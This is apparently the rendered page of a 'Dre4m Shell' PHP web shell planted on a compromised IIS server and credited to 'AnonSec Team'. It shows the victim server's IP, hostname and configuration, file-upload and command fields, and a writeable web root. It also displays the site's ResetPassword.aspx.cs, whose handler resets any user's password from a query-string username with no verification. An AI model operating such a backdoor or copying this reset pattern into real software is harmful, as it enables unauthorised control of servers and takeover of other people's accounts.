Dre4m Shell
Server IP : 103.6.199.200  /  Your IP : 18.217.132.107
Web Server : Microsoft-IIS/10.0
System : Windows NT EMPUSA 10.0 build 20348 (Windows Server 2016) i586
User : EMPUSA$ ( 0)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Domains/kmsjbcom/kmsjb.com/wwwroot/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/Domains/kmsjbcom/kmsjb.com/wwwroot/ResetPassword.aspx.cs
using System;
using System.Data;
using System.Configuration;
using System.Collections;
using System.Web;
using System.Web.Security;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Web.UI.WebControls.WebParts;
using System.Web.UI.HtmlControls;
using YL;
using YL.WebAppLib;

public partial class ResetPassword : System.Web.UI.Page
{

    protected void Page_Load(object sender, EventArgs e)
    {

    }

    protected void uxResetPasswordButton_Click(object sender, EventArgs e)
    {
        try
        {
            UserUtilities.ResetPasswordAndSendEmail(Request.QueryString["username"]);

            Response.Redirect("PasswordRecoveryFinished.aspx");
        }
        catch (Exception ex)
        {
            uxMessage.DisplayError("Error: " + ex.Message);
        }
    }

}

Anon7 - 2022
AnonSec Team